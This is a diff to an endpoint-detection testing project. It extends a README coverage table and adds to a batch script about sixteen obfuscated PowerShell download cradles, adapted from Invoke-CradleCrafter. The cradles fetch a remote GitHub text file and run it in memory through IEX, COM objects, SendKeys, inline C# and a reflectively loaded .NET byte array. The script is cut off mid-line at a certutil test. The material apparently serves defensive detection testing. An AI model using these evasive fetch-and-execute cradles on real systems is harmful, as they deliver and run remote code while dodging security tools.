diff --git a/README.md b/README.md index 23580a7..6f5397c 100644 --- a/README.md +++ b/README.md @@ -24,25 +24,27 @@ The script executes only calc.exe through numerous methods. You can replace this **Coverage** -| ATT&CK | LOLBAS | -| ------------- | ------------- | -| T1197 | msiexec.exe | -| T1118 | diskshadow.exe | -| T1170 | esentutl.exe | -| T1086 | replace.exe | -| T1121 | SyncAppvPublishingServer | -| T1117 | hh.exe | -| T1127 | ieexec.exe | -| T1047 | Setupapi | -| T1128 | Shdocvw | -| T1085 | csc.exe | -| T1130 | advpack.dll | -| T1191 | Scriptrunner | -| T1202 | sc | -| T1028 | Register-cimprovider | -| T1053 | control.exe | -| T1216 | manage-bde.wsf | -| T1218 | +The following attacks are currently covered by this script: + +| ATT&CK | LOLBAS | Invoke-CradleCrafter | +| ------------- | ------------- | ------------- | +| T1197 | msiexec.exe | MEMORY\PSWEBSTRING | +| T1118 | diskshadow.exe | MEMORY\PSWEBDATA | +| T1170 | esentutl.exe | MEMORY\PSWEBOPENREAD | +| T1086 | replace.exe | MEMORY\NETWEBSTRING | +| T1121 | SyncAppvPublishingServer | MEMORY\NETWEBDATA | +| T1117 | hh.exe | MEMORY\NETWEBOPENREAD | +| T1127 | ieexec.exe | MEMORY\PSWEBREQUEST | +| T1047 | Setupapi | MEMORY\PSRESTMETHOD | +| T1128 | Shdocvw | MEMORY\NETWEBREQUEST | +| T1085 | csc.exe | MEMORY\PSSENDKEYS | +| T1130 | advpack.dll | MEMORY\PSCOMWORD | +| T1191 | Scriptrunner | MEMORY\PSCOMEXCEL | +| T1202 | sc | MEMORY\PSCOMIE | +| T1028 | Register-cimprovider | MEMORY\PSCOMMSXML | +| T1053 | control.exe | MEMORY\PSINLINECSHARP | +| T1216 | manage-bde.wsf | MEMORY\PSCOMPILEDCSHARP | +| T1218 | | MEMORY\CERTUTIL | | T1033 | | T1140 | | T1183 | diff --git a/runtests.bat b/runtests.bat index 65952ea..92271d8 100644 --- a/runtests.bat +++ b/runtests.bat @@ -448,6 +448,9 @@ start "" cmd /c control.exe AllTheThings.dll echo Execution Finished at %time% %date% echo Command Excuted: control.exe AllTheThings.dll + +timeout 5 + echo %time% %date% [+] Testing manage-bde.wsf exec set comspec=C:\windows\system32\calc.exe start "" cmd /c cscript C:\windows\system32\manage-bde.wsf @@ -457,6 +460,100 @@ echo Command Excuted: cscript C:\windows\system32\manage-bde.wsf REM Reset ComSpec set comspec=C:\WINDOWS\system32\cmd.exe + + +echo ********************************************** +echo * Testing Invoke-CradleCrafter PAYLOADS * +echo ********************************************** + +echo %time% %date% [+] Testing MEMORY\PSWEBSTRING exec +start "" cmd /c powershell -c "Set-Item Variable:\FW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ect*;SI Variable:/d (.(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).PsObject.Methods|Where{(ChildItem Variable:/_).Value.Name-ilike'*Co*d'}).Name).Invoke((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'*man*Name'}).Name).Invoke('*w-*ct',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'I*t'}).Name).Invoke((Variable d -Va).((((Variable d -Va)|Get-Member)|Where{(ChildItem Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((Get-Item Variable:/FW).Value))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBDATA exec +start "" cmd /c powershell -c "dir ect*;SV j8 (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|?{$_.Name-like'*nd*e'}).Name).Invoke('Ne*ct',$TRUE,$TRUE))Net.WebClient);Set-Variable z 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create(([String]::Join('',(((Get-Variable j8 -ValueOn).((((Get-Variable j8 -ValueOn)|Member)|?{$_.Name-like'D*a'}).Name).Invoke((Variable z -ValueOnl))|%{$_-As'Char'}))))).Invoke()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBOPENREAD exec +start "" cmd /c powershell -c "$wr=(New-Object Net.WebClient);$url='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$sr=New-Object IO.StreamReader($wr.OpenRead($url));$res=$sr.ReadToEnd();$sr.Close();$res" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBSTRING exec +start "" cmd /c powershell -c "([System.Net.WebClient]::New().DownloadString('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'))" +echo Execution Finished at %time% %date% + +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBDATA exec +start "" cmd /c powershell -c "Set-Variable Q 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';SI Variable:/V0r ([Net.WebClient]::New());SV MAI (((((GV V0r).Value|Member)|?{(ChildItem Variable:/_).Value.Name-like'*wn*a'}).Name));&([ScriptBlock]::Create(([System.String]::Join('',(((GV V0r).Value.((GI Variable:\MAI).Value)((GV Q).Value)|ForEach{(GI Variable:\_).Value-As'Char'}))))))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBOPENREAD exec +start "" cmd /c powershell -c "Set-Variable RsL ([Net.WebClient]::New());SV 7SW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable RsL (LS Variable:RsL).Value.((((LS Variable:RsL).Value|Member)|Where-Object{(Variable _).Value.Name-ilike'*ad'}).Name)((Variable 7SW -Va));Set-Variable UR '';Try{While((Get-Item Variable:UR).Value+=[Char](LS Variable:RsL).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Get-Item Variable:UR).Value).InvokeReturnAsIs()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBREQUEST exec +start "" cmd /c powershell -c "Set-Item Variable:/c 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create((((Get-Item Variable:c).Value|ForEach-Object{(.(Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand|Get-Member|Where{$_.Name-clike'*t*a*d'}).Name)((Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand.PsObject.Methods|Where{$_.Name-clike'*nd*e'}).Name)('In*k*t',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) $_)})|ForEach-Object{$_.(($_|Get-Member)[4].Name).Invoke()})).Invoke()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSRESTMETHOD exec +start "" cmd /c powershell -c "SI Variable:50a 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable Z ((Get-ChildItem Variable:50a).Value|ForEach-Object{(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(Variable _ -Va).Name-like'*man*Name'}).Name)('*-Re*d',1,1),[Management.Automation.CommandTypes]::Cmdlet) (Variable _ -Va))});IEX (GV Z -ValueO)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBREQUEST exec +start "" cmd /c powershell -c "SI Variable:\UB ([Net.HttpWebRequest]::Create('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt').GetResponse().GetResponseStream());Set-Variable AZe '';Try{While((Variable AZe).Value+=[Char](Variable UB).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Variable AZe).Value).Invoke()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSSENDKEYS execs +start "" cmd /c powershell -c "ls _-*;Set-Item Variable:/O (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('N*-O*',1,1))-ComObj WScript.Shell);Set-Item Variable:/l 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable fN 'HKCU:\Software\Microsoft\Notepad';SI Variable:\76 'Notepad';$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|Where-Object{$_.Name-like'L*ame'}|ForEach{(LS Variable:\_).Value.Name}|Select -Firs 1).Invoke('System.Windows.Forms');Set-Variable 5M (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')(Item Variable:\fN).Value);@(@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),0),@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),([String]([Windows.Forms.Screen]::AllScreens)).Split('=')[5].Split('}')[0]))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_[0] (LS Variable:\_).Value[1]};SV yda (Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[2].Name).Invoke((Item Variable:76).Value).ProcessID;SI Variable:\J $Null;While(!((Get-Variable J).Value)){SI Variable:\J (Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}|ForEach{(LS Variable:\_).Value.MainWindowTitle});&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};While(!(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[0].Name).Invoke((Get-Variable J).Value)){&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke('^o');&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;@((Get-Variable l -ValueOnl),(' '*1000),'~')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS Variable:\_).Value)};SI Variable:q $Null;While((Item Variable:\q).Value.Length -lt 2){[System.Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke($_)};&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;SI Variable:q ([System.Windows.Forms.Clipboard]::([System.Windows.Forms.Clipboard].GetMethods()[16].Name).Invoke())};[System.Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS Variable:\_).Value)};If(Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}){@('{TAB}','~')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke($_)}};@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[7].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[6].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[5].Name))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_ (GCI Variable:5M).Value.((LS Variable:\_).Value)};(Item Variable:\q).Value|&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*e-*press*',1,1))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMWORD exec +start "" cmd /c powershell -c "gdr -*;Set-Item Variable:8 (&$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member)[2].Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*w-*ct',$TRUE,$TRUE))-C Word.Application);While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member)[420].Name)=(Get-Variable Fal* -Value);SV xz (Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).(((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).PsObject.Members|?{$_.Name-like'O*n'}).Name).Invoke('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name).(((ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name)|Member)[172].Name)|.(COMMAND *-Ex*n);(Get-Variable 8 -ValueOn).Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject((Get-Variable 8 -ValueOn))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMEXCEL exec +start "" cmd /c powershell -c "$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While($comExcel.Busy){Start-Sleep -Seconds 1}(($comExcel.Sheets.Item(1).Range(\"A1:Q\"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{(LS Variable:_).Value})-Join\"`n\");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMIE exec +start "" cmd /c powershell -c "popd;Set-Variable 9Z (&$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommandName('Ne*ct',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)-Co InternetExplorer.Application -Pro @{Silent=(Get-Variable Tr*).Value;Visible=(Get-ChildItem Variable:/Fal*).Value;Navigate='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'});While((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'Bu*y'}).Name)){&($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where{$_.Name-ilike'*m*ts'}).Name).Invoke('*t-S*p'))1}IEX (Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name)|GM|Where{$_.Name-ilike'o*Text'}).Name);(Variable 9Z -Val).Quit();[Void][Runtime.InteropServices.Marshal]::ReleaseComObject((Variable 9Z -Val))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMMSXML exec +start "" cmd /c powershell -c "ls _-*;SI Variable:/2 (&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*and'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComOb MsXml2.ServerXmlHttp);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[4].Name)('GET','https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt',(Get-ChildItem Variable:F*a*e).Value);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[5].Name)();&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*let'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('I*e-E*',1,$TRUE))(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[16].Name)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSINLINECSHARP exec +start "" cmd /c powershell -c "SI Variable:\x 'public class Xlqndampcv{public static string IGJnkoBiM(string url){return (new System.Net.WebClient()).DownloadString(url);}}';dir ty*;.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{$_.Name-ilike'*ts'}).Name).Invoke('A*-T*p*e')-Lang CSharp (Variable x).Value;Set-Item Variable:\0 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';.(GAL I*X)(([Xlqndampcv]::IGJnkoBiM((ChildItem Variable:0).Value)))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMPILEDCSHARP exec +start "" cmd /c powershell -c "[Void][System.Reflection.Assembly]::Load([Byte[]](@(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+@(0)*7+@(80,69,0,0,76,1,3,0,126,189,77,91)+@(0)*8+@(224,0,2,33,11,1,11,0,0,4,0,0,0,6,0,0,0,0,0,0,110,35,0,0,0,32,0,0,0,64,0,0,0,0,0,16,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)+@(0)*8+@(128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(32,35,0,0,75,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,0,0,8)+@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,116,3,0,0,0,32,0,0,0,4,0,0,0,2)+@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,10)+@(0)*14+@(64,0,0,66)+@(0)*16+@(80,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,168,2,0,0,1)+@(0)*55+@(19,48,2,0,17,0,0,0,1,0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,52,46,48,46,51,48,51,49,57,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,204,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,68,2,0,0,8,0,0,0,35,85,83,0,76,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,92,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,37,51,0,22,0,0,1,0,0,0,4,0,0,0,2,0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,0,0,0,0,0,10,0,1,0,0,0,0,0,6,0,43,0,36,0,6,0,99,0,67,0,6,0,131,0,67,0,10,0,179,0,168,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,50,0,10,0,1,0,109,32,0,0,0,0,134,24,57,0,15,0,2,0,0,0,1,0,63,0,17,0,57,0,19,0,25,0,57,0,15,0,33,0,57,0,15,0,33,0,189,0,24,0,9,0,57,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@(161,0,0,0,4)+@(0)*11+@(1,0,27,0,0,0,0,0,4)+@(0)*11+@(1,0,36)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,67,108,97,115,115,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101,109,0,79,98,106,101,99,116,0,77,101,116,104,111,100,0,46,99,116,111,114,0,117,114,108,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,99,114,97,100,108,101,0,83,121,115,116,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119,110,108,111,97,100,83,116,114,105,110,103,0,0,3,32,0,0,0,0,0,103,95,116,171,97,113,148,66,141,34,197,250,155,72,85,140,0,8,183,122,92,86,25,52,224,137,4,0,1,14,14,3,32,0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,0,0,0,72,35)+@(0)*8+@(0,0,94,35,0,0,0,32)+@(0)*22+@(80,35)+@(0)*8+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,0,16)+@(0)*154+@(1,0,16,0,0,0,24,0,0,128)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@(0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0,2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,32,0,0,0,64,0,11,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,112,51)+@(0)*502));([Class]::Method('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\CERTUTIL exec +start "" cmd 